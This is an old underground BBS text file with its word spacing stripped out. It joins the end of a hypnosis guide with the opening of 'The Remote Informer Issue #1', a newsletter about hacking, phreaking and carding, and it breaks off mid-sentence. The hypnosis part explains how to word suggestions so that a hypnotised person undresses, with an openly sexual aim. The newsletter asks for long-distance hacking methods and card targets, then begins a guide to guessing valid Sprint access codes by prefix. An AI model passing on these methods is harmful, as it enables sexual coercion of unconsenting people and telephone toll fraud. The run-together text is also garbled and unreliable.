relaxandletgo.Asthetinglingcontinuesitsjourneyupintoyoursolar plexus,youfeelyourinnerstomachbecomeveryrelaxed.Now,itmovesslowly intoyourchest,makingyourbreathingrelaxedaswell.Thefeelingbeginsto moveupyourarmstoyourshoulders,makingyourarmsheavyandrelaxedaswell. Youareawareofthetotalrelaxationyouarenowexperiencing,andyougiveway toit.Itisgoodandpeaceful,thetinglingnowmovesintoyourfaceandhead, relaxingyourjaws,neck,andfacialmuscles,makingyourcaresandworries floataway.Awayintotheblueskyasyourestblissfullyonthecloud.Ifthey arenotresponsiveoryouthinkthey(heorshe)isgoingtosleep,thenaddin a"...alwaysconcentratinguponmyvoice,ignoringallothersounds.Even thoughothersoundsexists,theyaidyouinyourrelaxation..."Theyshouldsoon letoutasighasiftheywerelettinggo,andtheirfaceshouldhavea "woodiness"toit,becomingfeatureless...Now,saythefollowing"...Younow findyourselfinahallway,thehallwayispeacefulandnice.AsIcountfrom10 to1youwillimagineyourselfwalkingfurtherandfurtherdownthehall.WhenI reachoneyouwillfindyourselfwhereyouwanttobe,inanother,higherstate ofconsciousandmind.(countfromtentoone)..."Dothisaboutthreeorfour times.Then,totestifthesubjectisunderhypnosisornot,say"...Youfeel astrangesensationinyour(armtheywritewith)arm,thefeelingbeginsat yourfingersandslowlymovesupyourarm,asitmovesthroughyourarmyourarm becomeslighterandlighter,itwillsoonbesolightitwill...becoming lighterandlighterwhicheachbreathandmoment..."Theirfingersshouldbegin totwitchandthenmoveup,thearmfollowing,nowmyfriend,youhavehim/her inhypnosis.Thefirsttimeyoudothis,whilehe/sheisundersaygoodthings, like:"Yourgoingtofeelgreattomorrow"or"Everydayineverywayyouwill findyourselfbecomingbetterandbetter"..Orsomecraplikethat...Themore theygounder,thedeeperinhypnosistheywillgeteachtimeyoudoit. Whattodowhenhypnotized Whenyouhavethemunderyoumustwordthingsverycarefullytogetyourway. Youcannotsimplysay...Takeoffyourclothesandfuckthepillow.No,that wouldnotreallydothetrick.Youmustsaysomethinglike...."youfindyour selfathome,inyourroomandyouhavetotakeashower(vividlydescribetheir roomandwhat'shappening),youbegintotakeoffyourclothes..."Now,it can'tbethatsimple,youmustknowthepersonshouse,room,andshowerroom. Thendescribethingsvividlyandtellthemtoactitout(theyhavetobedeeply undertodothis).Iwouldjustsuggestthatyouexperimentawhile,andgetto knowhowtodothings. Wakingup Wakingupisveryeasy,justsay"...asIcountfrom1to5youwillfind yourselfbecomingmoreandmoreawake,moreandmorelively.Whenyouwakeup youwillfindyourselfcompletelyalive,awake,andrefreshed.Mentallyand physically,rememberingthepleasantsensationthathypnosisbrings...Waking upfeelinglikeanewbornbaby,rebornwithlifeandvigor,feelingexcellent. Rememberingthatnexttimeyouenterhypnosisitwillbecomeaneverincreasing deeperanddeeperstatethanbefore. 1. Youfeelenergycoursethroughoutyourlimbs. 2. Youbegintobreathedeeply,stirring. 3. Beginningtomovemoreandmoreyoureyesopen,bringingyouuptofull conscious. 4. Youareup,up,upandawakeningmoreandmore. 5. Youareawakeandfeelinggreat. Andthat'sit!Younowknowhowtohypnotizeyourselfandsomeoneelse. Youwilllearnmoreandmoreasyouexperiment. 67.TheRemoteInformerIssue#1byTrackerandNomanBates

Introduction Welcometothefirstissueof'TheRemoteInformer'!Thisnewsletterisreader supported.Ifthereadersofthisnewsletterdonothelpsupportit,thenit willend.Weareputtingthisouttohelpouttheonesthatwouldliketoread it.Ifyouareoneofthosewhothinkstheyknoweverything,thendon'tbother readingit.Thisnewsletterisnotanythinglikethefutureissues.Thefuture issueswillcontainseveralsections,aslongasreaderinputisobtained. Belowisanoutlineoverviewofthesectionsinthefutureissues. I/OBoard(Input/OutputBoard) TheI/OBoardisforquestionsyouhave,thatwemightbeabletoanswerorat leastreferyoutosomeoneorsomething.Wewillbehonestifwecannothelp you.Wewillnotmakeupsomething,ortotheeffect,justtomakeitlooklike weansweredyou.TherewillbeasectionintheI/OBoardforquestionswe cannotanswer,andthenthereaderswillhavetheopportunitytoanswerit.We willprintanythingthatisreasonableinthenewsletter,evencomplaintsifyou feellikeyouarebetterthaneveryone. NewsCenter Thissectionwillbefornewsaroundtheunderworld.Itwilltalkofbustsof peopleintheunderworldandanythingelsethatwouldbeconsiderednews.If youfindarticlesinthepaper,orsomethinghappensinyourlocalarea,typeit up,anduploadittooneoftheboardslistedattheendofthenewsletter. Yourhandlewillbeplacedinthearticle.Ifyoudoenteranewsarticle, pleasestatethedateandfromwhereyougotit. FeatureSection TheFeatureSectionwillbethelargestofthesectionsasitwillbeonthe topicthatisfeaturedinthatissue.Thiswillbelargelyreaderinputwhich willbesentinbetweenissues.Attheendoftheissueathand,itwilltell thetopicofthenextissue,therefore,ifyouhavesomethingtocontribute, thenyouwillhaveampletimetoprepareyourarticle. Hardware/SoftwareReview Inthissection,wewillreviewthegoodandbadpointsofhardwareandsoftware relatedtotheunderworld.Itwillbeanextensivereview,ratherthanjusta smallparagraph. TheTops ThissectionwillbetheareawherethetopunderworldBBS's,hackingprograms, modemscanners,etc.willbeshown.Thiswillbereaderselectedandwillnot bealteredinanyway.Thetopicsarelistedbelow. ? UnderworldBBS's(Hack,Phreak,Card,Anarchy,etc.) ? HackingprogramsforHayescompatables ? Hackingprogramsfor1030/Xm301modems ? ModemscannersforHayescompatables ? Modemscannersfor1030/Xm301modems ? Othertypeillegalprograms ? Youmayaddtopicstothelistifenoughwillsupportit. TidBits Thiswillcontaintipsandhelpfulinformationsentinbytheusers.Ifyouhave anyinformationyouwishtocontribute,thenputitinatextfileanduploadit tooneoftheBBS'slistedattheendofthenewsletter.Please,nolong distancecodes,mainframepasswords,etc.Wemayaddothersectionsastimegoes by.Thisnewsletterwillnotbeputoutonaregularbasis.Itwillbeputout

whenwehaveenougharticlesandinformationtoputinit.Theremaybeupto5 amonth,buttherewillalwaysbeatleastoneamonth.Wewouldlikeyou,the readers,tosendusanythingyoufeelwouldbeofinteresttoothers,like hackinghints,methodsofhackinglongdistancecompanies,companiestocard from,etc.Wewillmaintainthenewsletteraslongasthereaderssupportit. Thatistheendoftheintroduction,buttakealookatthisnewsletter,asit doescontaininformationthatmaybeofvaluetoyou. HackingSprint:TheEasyWay IfyouhackUSSprint,9500777(bythewayitisnolongerGTESprint),andyou arefrustratedathackingseveralhoursonlytofindoneortwocodes,then followthesetips,anditwillincreaseyourresultstremendously.First,one thingthatMr.MojoprovedisthatSprintwillnotstoremorethanonecodein everyhundrednumbers.(ex:98765400to98765499maycontainonlyonecode). TheremayNOTbeacodeinthathundred,buttherewillneverbemorethanone. Sprint's9digitcodesarestoredfrom500000000through999999999.Inthe beginningofSprint's950port,theyonlyhad8digitcodes.Thentheystarted convertingto9digitcodes,storingall8digitcodesbetween10000000and 49999999andall9digitcodesbetween500000000and999999999.Sprinthas sincecanceledmost8digitcodes,althoughthereareafewleftthathavebeen denotedastestcodes.Occasionally,Ihearofphreakssayingtheyhave8digit codes,butwhenverifyingthem,thecodeswereinvalid.Now,wheredoyoustart? Youhavealreadynarrowedthelowandhighnumbersinhalf,thereforealready increasingyourchancesofgoodresultsby50percent.Thenextstepistofind agoodprefixtohack.Bytheway,aprefix,inhackingterms,isthefirst digitsinacodethatcanbeanylengthexceptthesamenumberofdigitsthe codeis.(ex:123456789isacode.Thatmeans1,12,123,1234,12345,123456, 1234567,and12345678areprefixes)Thewayyoufindagoodprefixtohackis tomanuallyenteracodeprefix.Ifwhenyouenterthecodeprefixandavalid destinationnumberandyoudonotheartheringingoftherecordingtellingyou th